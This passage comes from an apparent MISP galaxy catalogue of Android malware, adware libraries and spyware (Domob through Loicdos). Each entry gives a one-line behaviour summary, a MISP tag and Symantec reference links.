https://www.symantec.com/security_response/writeup.jsp?docid=2011-081510-4323-99

Domob

Domob is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Domob"

Table 150. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-4235-99

Dougalek

Dougalek is a Trojan horse for Android devices that steals information from the compromised device. The threat is typically disguised to display a video.

The tag is: misp-galaxy:android="Dougalek"

Table 151. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-041601-3400-99

Dowgin

Dowgin is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Dowgin"

Table 152. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-033108-4723-99

Droidsheep

Droidsheep is a hacktool for Android devices that hijacks social networking accounts on compromised devices.

The tag is: misp-galaxy:android="Droidsheep"

Table 153. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031014-3628-99

Dropdialer

Dropdialer is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: misp-galaxy:android="Dropdialer"

Table 154. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-070909-0726-99

Dupvert

Dupvert is a Trojan horse for Android devices that opens a back door and steals information from the compromised device. It may also perform other malicious activities.

The tag is: misp-galaxy:android="Dupvert"

Table 155. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-072313-1959-99

Dynamicit

Dynamicit is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Dynamicit"

Table 156. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-1346-99

Ecardgrabber

Ecardgrabber is an application that attempts to read details from NFC-enabled credit cards that are in close proximity to the device.

The tag is: misp-galaxy:android="Ecardgrabber"

Table 157. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062215-0939-99

Ecobatry

Ecobatry is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Ecobatry"

Table 158. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080606-4102-99

Enesoluty

Enesoluty is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Enesoluty"

Table 159. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-090607-0807-99

Everbadge

Everbadge is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Everbadge"

Table 160. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-3736-99

Ewalls

Ewalls is a Trojan horse for the Android operating system that steals information from the mobile device.

The tag is: misp-galaxy:android="Ewalls"

Table 161. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2010-073014-0854-99

Exprespam

Exprespam is a Trojan horse for Android devices that displays a fake message and steals personal information stored on the compromised device.

The tag is: misp-galaxy:android="Exprespam"

Table 162. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-010705-2324-99

Fakealbums

Fakealbums is a Trojan horse for Android devices that monitors and forwards received messages from the compromised device.

The tag is: misp-galaxy:android="Fakealbums"

Table 163. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-071819-0636-99

Fakeangry

Fakeangry is a Trojan horse on the Android platform that opens a back door, downloads files, and steals potentially confidential information from the compromised device.

The tag is: misp-galaxy:android="Fakeangry"

Table 164. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-022823-4233-99

Fakeapp

Fakeapp is a Trojan horse for Android devices that downloads configuration files to display advertisements and collects information from the compromised device.

The tag is: misp-galaxy:android="Fakeapp"

Table 165. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-022805-4318-99

Fakebanco

Fakebanco is a Trojan horse for Android devices that redirects users to a phishing page in order to steal their information.

The tag is: misp-galaxy:android="Fakebanco"

Table 166. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-112109-5329-99

Fakebank

Fakebank is a Trojan horse that steals information from the compromised device.

The tag is: misp-galaxy:android="Fakebank"

Table 167. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-071813-2448-99

Fakebank.B

Fakebank.B is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Fakebank.B"

Table 168. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-101114-5645-99

Fakebok

Fakebok is a Trojan horse for Android devices that sends SMS messages to premium phone numbers.

The tag is: misp-galaxy:android="Fakebok"

Table 169. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-021115-5153-99

Fakedaum

Fakedaum is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fakedaum"

Table 170. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-061813-3630-99

Fakedefender

Fakedefender is a Trojan horse for Android devices that displays fake security alerts in an attempt to convince the user to purchase an app in order to remove non-existent malware or security risks from the device.

The tag is: misp-galaxy:android="Fakedefender"

Table 171. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-060301-4418-99

Fakedefender.B

Fakedefender.B is a Trojan horse for Android devices that displays fake security alerts in an attempt to convince the user to purchase an app in order to remove non-existent malware or security risks from the device.

The tag is: misp-galaxy:android="Fakedefender.B"

Table 172. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-091013-3953-99

Fakedown

Fakedown is a Trojan horse for Android devices that downloads more malicious apps onto the compromised device.

The tag is: misp-galaxy:android="Fakedown"

Table 173. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-041803-5918-99

Fakeflash

Fakeflash is a Trojan horse for Android devices that installs a fake Flash application in order to direct users to a website.

The tag is: misp-galaxy:android="Fakeflash"

Table 174. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-070318-2122-99

Fakegame

Fakegame is a Trojan horse for Android devices that displays advertisements and steals information from the compromised device.

The tag is: misp-galaxy:android="Fakegame"

Table 175. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-040808-2922-99

Fakeguard

Fakeguard is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fakeguard"

Table 176. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-102908-3526-99

Fakejob

Fakejob is a Trojan horse for Android devices that redirects users to scam websites.

The tag is: misp-galaxy:android="Fakejob"

Table 177. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030721-3048-99

Fakekakao

Fakekakao is a Trojan horse for Android devices that sends SMS messages to contacts stored on the compromised device.

The tag is: misp-galaxy:android="Fakekakao"

Table 178. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-071617-2031-99

Fakelemon

Fakelemon is a Trojan horse for Android devices that blocks certain SMS messages and may subscribe to services without the user’s consent.

The tag is: misp-galaxy:android="Fakelemon"

Table 179. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-120609-3608-99

Fakelicense

Fakelicense is a Trojan horse that displays advertisements on the compromised device.

The tag is: misp-galaxy:android="Fakelicense"

Table 180. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-062709-1437-99

Fakelogin

Fakelogin is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fakelogin"

Table 181. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-102108-5457-99

FakeLookout

FakeLookout is a Trojan horse for Android devices that opens a back door and steals information on the compromised device.

The tag is: misp-galaxy:android="FakeLookout"

Table 182. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-101919-2128-99

FakeMart

FakeMart is a Trojan horse for Android devices that may send SMS messages to premium rate numbers. It may also block incoming messages and steal information from the compromised device.

The tag is: misp-galaxy:android="FakeMart"

Table 183. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-081217-1428-99

Fakemini

Fakemini is a Trojan horse for Android devices that disguises itself as an installation for the Opera Mini browser and sends premium-rate SMS messages to a predetermined number.

The tag is: misp-galaxy:android="Fakemini"

Table 184. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-110410-5958-99

Fakemrat

Fakemrat is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Fakemrat"

Table 185. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2016-012608-1538-99

Fakeneflic

Fakeneflic is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Fakeneflic"

Table 186. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-101105-0518-99

Fakenotify

Fakenotify is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers, collects and sends information, and periodically displays Web pages. It also downloads legitimate apps onto the compromised device.

The tag is: misp-galaxy:android="Fakenotify"

Table 187. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-011302-3052-99

Fakepatch

Fakepatch is a Trojan horse for Android devices that downloads more files onto the device.

The tag is: misp-galaxy:android="Fakepatch"

Table 188. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062811-2820-99

Fakeplay

Fakeplay is a Trojan horse for Android devices that steals information from the compromised device and sends it to a predetermined email address.

The tag is: misp-galaxy:android="Fakeplay"

Table 189. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-100917-3825-99

Fakescarav

Fakescarav is a Trojan horse for Android devices that displays fake security alerts in an attempt to convince the user to pay in order to remove non-existent malware or security risks from the device.

The tag is: misp-galaxy:android="Fakescarav"

Table 190. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-012809-1901-99

Fakesecsuit

Fakesecsuit is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fakesecsuit"

Table 191. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-060514-1301-99

Fakesucon

Fakesucon is a Trojan horse program for Android devices that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Fakesucon"

Table 192. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-120915-2524-99

Faketaobao

Faketaobao is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Faketaobao"

Table 193. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-062518-4057-99

Faketaobao.B

Faketaobao.B is a Trojan horse for Android devices that intercepts and sends incoming SMS messages to a remote attacker.

The tag is: misp-galaxy:android="Faketaobao.B"

Table 194. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-012106-4013-99

Faketoken

Faketoken is a Trojan horse that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Faketoken"

Table 195. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-032211-2048-99

http://bgr.com/2017/08/18/android-malware-faketoken-steal-credit-card-info/

Fakeupdate

Fakeupdate is a Trojan horse for Android devices that downloads other applications onto the compromised device.

The tag is: misp-galaxy:android="Fakeupdate"

Table 196. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-081914-5637-99

Fakevoice

Fakevoice is a Trojan horse for Android devices that dials a premium-rate phone number.

The tag is: misp-galaxy:android="Fakevoice"

Table 197. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-040510-3249-99

Farmbaby

Farmbaby is a spyware application for Android devices that logs certain information and sends SMS messages to a predetermined phone number.

The tag is: misp-galaxy:android="Farmbaby"

Table 198. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-090715-3641-99

Fauxtocopy

Fauxtocopy is a spyware application for Android devices that gathers photos from the device and sends them to a predetermined email address.

The tag is: misp-galaxy:android="Fauxtocopy"

Table 199. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111515-3940-99

Feiwo

Feiwo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Feiwo"

Table 200. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-4038-99

FindAndCall

FindAndCall is a Potentially Unwanted Application for Android devices that may leak information.

The tag is: misp-galaxy:android="FindAndCall"

Table 201. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031020-2906-99

Finfish

Finfish is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Finfish"

Table 202. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-083016-0032-99

Fireleaker

Fireleaker is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fireleaker"

Table 203. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031814-5207-99

Fitikser

Fitikser is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fitikser"

Table 204. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-093015-2830-99

Flexispy

Flexispy is a Spyware application for Android devices that logs the device’s activity and sends it to a predetermined website.

The tag is: misp-galaxy:android="Flexispy"

Table 205. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-122006-4805-99

Fokonge

Fokonge is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Fokonge"

Table 206. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-071802-0727-99

FoncySMS

FoncySMS is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers. It may also connect to an IRC server and execute any received shell commands.

The tag is: misp-galaxy:android="FoncySMS"

Table 207. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-011502-2651-99

Frogonal

Frogonal is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Frogonal"

Table 208. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062205-2312-99

Ftad

Ftad is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Ftad"

Table 209. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040114-2020-99

Funtasy

Funtasy is a Trojan horse for Android devices that subscribes the user to premium SMS services.

The tag is: misp-galaxy:android="Funtasy"

Table 210. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-092519-5811-99

GallMe

GallMe is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="GallMe"

Table 211. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-1336-99

Gamex

Gamex is a Trojan horse for Android devices that downloads further threats.

The tag is: misp-galaxy:android="Gamex"

Table 212. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051015-1808-99

Gappusin

Gappusin is a Trojan horse for Android devices that downloads applications and disguises them as system updates.

The tag is: misp-galaxy:android="Gappusin"

Table 213. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-022007-2013-99

Gazon

Gazon is a worm for Android devices that spreads through SMS messages.

The tag is: misp-galaxy:android="Gazon"

Table 214. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-030320-1436-99

Geinimi

Geinimi is a Trojan that opens a back door and transmits information from the device to a remote location.

The tag is: misp-galaxy:android="Geinimi"

Table 215. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-010111-5403-99

Generisk

Generisk is a generic detection for Android applications that may pose a privacy, security, or stability risk to the user or user’s Android device.

The tag is: misp-galaxy:android="Generisk"

Table 216. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-062622-1559-99

Genheur

Genheur is a generic detection for many individual but varied Trojans for Android devices for which specific definitions have not been created. A generic detection is used because it protects against many Trojans that share similar characteristics.

The tag is: misp-galaxy:android="Genheur"

Table 217. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032613-0848-99

Genpush

Genpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Genpush"

Table 218. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-033109-0426-99

GeoFake

GeoFake is a Trojan horse for Android devices that sends SMS messages to premium-rate numbers.

The tag is: misp-galaxy:android="GeoFake"

Table 219. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-040217-3232-99

Geplook

Geplook is a Trojan horse for Android devices that downloads additional apps onto the compromised device.

The tag is: misp-galaxy:android="Geplook"

Table 220. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-121814-0917-99

Getadpush

Getadpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Getadpush"

Table 221. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040112-0957-99

Ggtracker

Ggtracker is a Trojan horse for Android devices that sends SMS messages to a premium-rate number. It may also steal information from the device.

The tag is: misp-galaxy:android="Ggtracker"

Table 222. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-062208-5013-99

Ghostpush

Ghostpush is a Trojan horse for Android devices that roots the compromised device. It may then perform malicious activities on the compromised device.

The tag is: misp-galaxy:android="Ghostpush"

Table 223. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-100215-3718-99

Gmaster

Gmaster is a Trojan horse on the Android platform that steals potentially confidential information from the compromised device.

The tag is: misp-galaxy:android="Gmaster"

Table 224. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-082404-5049-99

Godwon

Godwon is a Trojan horse for Android devices that steals information.

The tag is: misp-galaxy:android="Godwon"

Table 225. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-091017-1833-99

Golddream

Golddream is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Golddream"

Table 226. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-070608-4139-99

Goldeneagle

Goldeneagle is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Goldeneagle"

Table 227. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-090110-3712-99

Golocker

Golocker is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Golocker"

Table 228. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062003-3214-99

Gomal

Gomal is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Gomal"

Table 229. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-101312-1047-99

Gonesixty

Gonesixty is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Gonesixty"

Table 230. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-093001-2649-99

Gonfu

Gonfu is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Gonfu"

Table 231. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-060610-3953-99

Gonfu.B

Gonfu.B is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Gonfu.B"

Table 232. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-030811-5215-99

Gonfu.C

Gonfu.C is a Trojan horse for Android devices that may download additional threats on the compromised device.

The tag is: misp-galaxy:android="Gonfu.C"

Table 233. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031817-3639-99

Gonfu.D

Gonfu.D is a Trojan horse that opens a back door on Android devices.

The tag is: misp-galaxy:android="Gonfu.D"

Table 234. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-040414-1158-99

Gooboot

Gooboot is a Trojan horse for Android devices that may send text messages to premium rate numbers.

The tag is: misp-galaxy:android="Gooboot"

Table 235. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031818-3034-99

Goodadpush

Goodadpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Goodadpush"

Table 236. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040108-0913-99

Greystripe

Greystripe is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Greystripe"

Table 237. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052919-2643-99

Gugespy

Gugespy is a spyware program for Android devices that logs the device’s activity and sends it to a predetermined email address.

The tag is: misp-galaxy:android="Gugespy"

Table 238. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-071822-2515-99

Gugespy.B

Gugespy.B is a spyware program for Android devices that monitors and sends certain information to a remote location.

The tag is: misp-galaxy:android="Gugespy.B"

Table 239. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-070511-5038-99

Gupno

Gupno is a Trojan horse for Android devices that poses as a legitimate app and attempts to charge users for features that are normally free. It may also display advertisements on the compromised device.

The tag is: misp-galaxy:android="Gupno"

Table 240. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-072211-5533-99

Habey

Habey is a Trojan horse for Android devices that may attempt to delete files and send SMS messages from the compromised device.

The tag is: misp-galaxy:android="Habey"

Table 241. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-100608-4512-99

Handyclient

Handyclient is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Handyclient"

Table 242. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040307-5027-99

Hehe

Hehe is a Trojan horse for Android devices that blocks incoming calls and SMS messages from specific numbers. The Trojan also steals information from the compromised device.

The tag is: misp-galaxy:android="Hehe"

Table 243. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-012211-0020-99

Hesperbot

Hesperbot is a Trojan horse for Android devices that opens a back door on the compromised device and may steal information.

The tag is: misp-galaxy:android="Hesperbot"

Table 244. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-121010-1120-99

Hippo

Hippo is a Trojan horse that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Hippo"

Table 245. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-071215-3547-99

Hippo.B

Hippo.B is a Trojan horse that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Hippo.B"

Table 246. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031915-0151-99

IadPush

IadPush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="IadPush"

Table 247. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040315-4104-99

iBanking

iBanking is a Trojan horse for Android devices that opens a back door on the compromised device and may steal information.

The tag is: misp-galaxy:android="iBanking"

Table 248. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030713-0559-99

Iconosis

Iconosis is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Iconosis"

Table 249. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062107-3327-99

Iconosys

Iconosys is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Iconosys"

Table 250. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-081309-0341-99

Igexin

Igexin is an advertisement library that is bundled with certain Android applications. Igexin has the capability of spying on victims through otherwise benign apps by downloading malicious plugins.

The tag is: misp-galaxy:android="Igexin"

Igexin is also known as:

  • IcicleGum

Igexin has relationships with:

  • similar: misp-galaxy:android="IcicleGum" with estimative-language:likelihood-probability="likely"

Table 251. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-032606-5519-99

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

https://blog.lookout.com/igexin-malicious-sdk

ImAdPush

ImAdPush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="ImAdPush"

Table 252. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040323-0218-99

InMobi

InMobi is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="InMobi"

Table 253. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052713-1527-99

Jifake

Jifake is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Jifake"

Table 254. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-073021-4247-99

Jollyserv

Jollyserv is a Trojan horse for Android devices that sends SMS messages and steals information from the compromised device.

The tag is: misp-galaxy:android="Jollyserv"

Table 255. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-090311-4533-99

Jsmshider

Jsmshider is a Trojan horse that opens a back door on Android devices.

The tag is: misp-galaxy:android="Jsmshider"

Table 256. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-062114-0857-99

Ju6

Ju6 is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Ju6"

Table 257. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-2428-99

Jumptap

Jumptap is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Jumptap"

Table 258. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052713-0859-99

Jzmob

Jzmob is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Jzmob"

Table 259. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-1703-99

Kabstamper

Kabstamper is a Trojan horse for Android devices that corrupts images found on the compromised device.

The tag is: misp-galaxy:android="Kabstamper"

Table 260. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-060706-2305-99

Kidlogger

Kidlogger is a Spyware application for Android devices that logs the device’s activity and sends it to a predetermined website.

The tag is: misp-galaxy:android="Kidlogger"

Table 261. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-122014-1927-99

Kielog

Kielog is a Trojan horse for Android devices that logs keystrokes and sends the stolen information to the remote attacker.

The tag is: misp-galaxy:android="Kielog"

Table 262. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-040205-4035-99

Kituri

Kituri is a Trojan horse for Android devices that blocks certain SMS messages from being received by the device. It may also send SMS messages to a premium-rate number.

The tag is: misp-galaxy:android="Kituri"

Table 263. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-061111-5350-99

Kranxpay

Kranxpay is a Trojan horse for Android devices that downloads other apps onto the device.

The tag is: misp-galaxy:android="Kranxpay"

Table 264. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-071009-0809-99

Krysanec

Krysanec is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Krysanec"

Table 265. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-090113-4128-99

Kuaidian360

Kuaidian360 is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Kuaidian360"

Table 266. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040109-2415-99

Kuguo

Kuguo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Kuguo"

Table 267. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040315-5215-99

Lastacloud

Lastacloud is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Lastacloud"

Table 268. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-121216-4334-99

Laucassspy

Laucassspy is a spyware program for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Laucassspy"

Table 269. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-092409-1822-99

Lifemonspy

Lifemonspy is a spyware application for Android devices that can track the phone’s location, download SMS messages, and erase certain data from the device.

The tag is: misp-galaxy:android="Lifemonspy"

Table 270. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111516-5540-99

Lightdd

Lightdd is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Lightdd"

Table 271. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-053114-2342-99

Loaderpush

Loaderpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Loaderpush"

Table 272. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040108-0244-99

Locaspy

Locaspy is a Potentially Unwanted Application for Android devices that tracks the location of the compromised device.

The tag is: misp-galaxy:android="Locaspy"

Table 273. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030720-3500-99

Lockdroid.E

Lockdroid.E is a Trojan horse for Android devices that locks the screen and displays a ransom demand on the compromised device.

The tag is: misp-galaxy:android="Lockdroid.E"

Table 274. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-103005-2209-99

Lockdroid.F

Lockdroid.F is a Trojan horse for Android devices that locks the screen and displays a ransom demand on the compromised device.

The tag is: misp-galaxy:android="Lockdroid.F"

Table 275. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-102215-4346-99

Lockdroid.G

Lockdroid.G is a Trojan horse for Android devices that may display a ransom demand on the compromised device.

The tag is: misp-galaxy:android="Lockdroid.G"

Table 276. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-050610-2450-99

Lockdroid.H

Lockdroid.H is a Trojan horse for Android devices that locks the screen and displays a ransom demand on the compromised device.

The tag is: misp-galaxy:android="Lockdroid.H"

Table 277. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2016-031621-1349-99

Lockscreen

Lockscreen is a Trojan horse for Android devices that locks the compromised device from use.

The tag is: misp-galaxy:android="Lockscreen"

Table 278. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-032409-0743-99

LogiaAd

LogiaAd is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="LogiaAd"

Table 279. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052713-0348-99

Loicdos

Loicdos is an Android application that provides an interface to a website in order to perform a denial of service (DoS) attack against a computer.

The tag is: misp-galaxy:android="Loicdos"

Table 280. Table References

Links

